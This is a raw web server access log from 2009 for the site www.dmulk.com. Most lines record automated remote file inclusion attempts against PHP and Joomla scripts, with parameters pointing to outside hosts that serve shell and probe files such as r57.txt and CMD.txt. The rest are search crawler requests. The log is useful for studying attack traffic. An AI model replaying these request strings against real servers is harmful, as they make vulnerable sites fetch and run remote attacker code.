61.252.26.98 - - [16/Sep/2009:11:18:07 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:18:09 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:18:09 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:18:09 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:18:13 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:18:13 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:18:13 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:11:18:23 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:11:18:23 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:11:18:25 -0700] "GET /index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 200 19775 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:18:28 -0700] "GET /logs/access_080528.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:18:30 -0700] "GET /logs/access_080514.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:18:38 -0700] "GET /logs/access_080518.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:18:40 -0700] "GET /logs/access_080518.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:11:18:53 -0700] "GET /logs/access_090213.log//index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:11:18:58 -0700] "GET /logs/access_090213.log%20%20//index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:18:59 -0700] "GET /logs/access_080323.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:19:02 -0700] "GET /logs/access_090621.log HTTP/1.0" 200 2485810 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:19:03 -0700] "GET /logs/access_070817.log HTTP/1.0" 200 59720 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:11:21:17 -0700] "GET /logs/access_090213.log%20%20//index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:11:21:45 -0700] "GET /main.php?inc=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:11:22:08 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:11:22:08 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:11:22:08 -0700] "GET /logs/access_090601.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:11:22:28 -0700] "GET /logs/access_080303.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:11:22:36 -0700] "GET /logs/access_081213.log//main.php?inc=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:11:22:36 -0700] "GET /main.php?inc=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:11:22:36 -0700] "GET /logs//main.php?inc=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:11:22:49 -0700] "GET /logs/access_080402.log//main.php?inc=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:24:44 -0700] "GET /logs/access_080609.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
94.23.194.161 - - [16/Sep/2009:11:25:16 -0700] "GET /errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.194.161 - - [16/Sep/2009:11:25:16 -0700] "GET /logs/errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.194.161 - - [16/Sep/2009:11:25:16 -0700] "GET /logs/access_081107.log%20%20/errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:25:25 -0700] "GET /logs/access_081013.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:26:23 -0700] "GET /logs/access_090202.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
94.23.194.161 - - [16/Sep/2009:11:26:36 -0700] "GET /logs/access_090326.log%20%20/errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:27:29 -0700] "GET /logs/access_080518.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:27:30 -0700] "GET /logs/access_090131.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:27:41 -0700] "GET /logs/access_090625.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:27:41 -0700] "GET /logs/access_080518.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:27:51 -0700] "GET /logs/access_080518.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:27:56 -0700] "GET /logs/access_080515.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:27:57 -0700] "GET /logs/access_080515.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:27:57 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 117496 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:27:57 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 117496 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:27:57 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 19920 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:27:57 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 19920 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:28:05 -0700] "GET /logs/access_090508.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:28:06 -0700] "GET /logs/access_090508.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.223.143.131 - - [16/Sep/2009:11:29:27 -0700] "GET /logs/access_081125.log/////////?cmd&file=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.223.143.131 - - [16/Sep/2009:11:29:27 -0700] "GET /logs/////////?cmd&file=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 200 117503 "-" "libwww-perl/5.79" "www.dmulk.com"
74.223.143.131 - - [16/Sep/2009:11:29:28 -0700] "GET ////////?cmd&file=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 200 19923 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:11:31:09 -0700] "GET /logs/access_090903.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:11:31:09 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:11:31:09 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:11:31:17 -0700] "GET //protection.php?action=logout&siteurl=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:11:31:40 -0700] "GET /logs/access_090903.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:11:31:40 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:11:31:40 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:11:32:17 -0700] "GET /logs/access_081017.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:11:32:17 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
61.100.5.136 - - [16/Sep/2009:11:32:56 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.100.5.136 - - [16/Sep/2009:11:32:56 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.100.5.136 - - [16/Sep/2009:11:32:56 -0700] "GET /logs/access_080215.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:11:33:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:11:33:18 -0700] "GET /logs/access_090408.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:11:33:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:11:33:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:11:33:23 -0700] "GET /logs/access_090408.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:11:33:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:33:57 -0700] "GET /logs/access_080119.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:34:02 -0700] "GET /logs/access_090124.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:34:04 -0700] "GET /logs/access_080621.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:11:34:11 -0700] "GET /logs/environment.php?DIR_PREFIX=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:11:34:11 -0700] "GET /environment.php?DIR_PREFIX=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:11:34:11 -0700] "GET /logs/access_090213.log%20%20/environment.php?DIR_PREFIX=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:11:34:19 -0700] "GET /environment.php?DIR_PREFIX=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:11:34:19 -0700] "GET /logs/environment.php?DIR_PREFIX=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:11:34:19 -0700] "GET /logs/access_090213.log%20%20/environment.php?DIR_PREFIX=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.120.34.217 - - [16/Sep/2009:11:34:56 -0700] "GET /logs/access_080602.log//?page=http://www.sabordaservas.com/loja/produtos/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
188.120.34.217 - - [16/Sep/2009:11:34:56 -0700] "GET /logs//?page=http://www.sabordaservas.com/loja/produtos/idv6.txt??? HTTP/1.1" 200 117496 "-" "libwww-perl/5.831" "www.dmulk.com"
64.157.4.41 - - [16/Sep/2009:11:34:58 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
188.120.34.217 - - [16/Sep/2009:11:34:58 -0700] "GET /?page=http://www.sabordaservas.com/loja/produtos/idv6.txt??? HTTP/1.1" 200 19911 "-" "libwww-perl/5.831" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:11:35:46 -0700] "GET /logs/access_080518.log HTTP/1.0" 200 2894372 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:35:49 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:35:49 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:35:49 -0700] "GET /logs/access_080906.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.120.34.217 - - [16/Sep/2009:11:35:50 -0700] "GET /logs/access_080524.log//?page=http://www.sabordaservas.com/loja/produtos/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:35:54 -0700] "GET /logs/access_090122.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:11:36:38 -0700] "GET /logs/access_090213.log/environment.php?DIR_PREFIX=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:11:36:47 -0700] "GET /logs/access_090213.log/environment.php?DIR_PREFIX=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:36:48 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:36:48 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:36:48 -0700] "GET /logs/access_080906.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:36:52 -0700] "GET /logs/access_090122.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.100.5.136 - - [16/Sep/2009:11:37:02 -0700] "GET /logs/access_080205.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:37:03 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:37:03 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:37:03 -0700] "GET /logs/access_080518.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:37:08 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:37:08 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:37:08 -0700] "GET /logs/access_080518.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:37:09 -0700] "GET /logs/access_090902.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:37:11 -0700] "GET /logs/access_090902.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:37:36 -0700] "GET /logs/access_080906.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:37:36 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:37:36 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:37:40 -0700] "GET /logs/access_090122.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:38:06 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:38:13 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:38:13 -0700] "GET /logs/access_080906.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:38:13 -0700] "GET /logs/access_090122.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:11:38:42 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:11:38:42 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:11:38:42 -0700] "GET /logs/access_080906.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:11:38:47 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:11:38:47 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
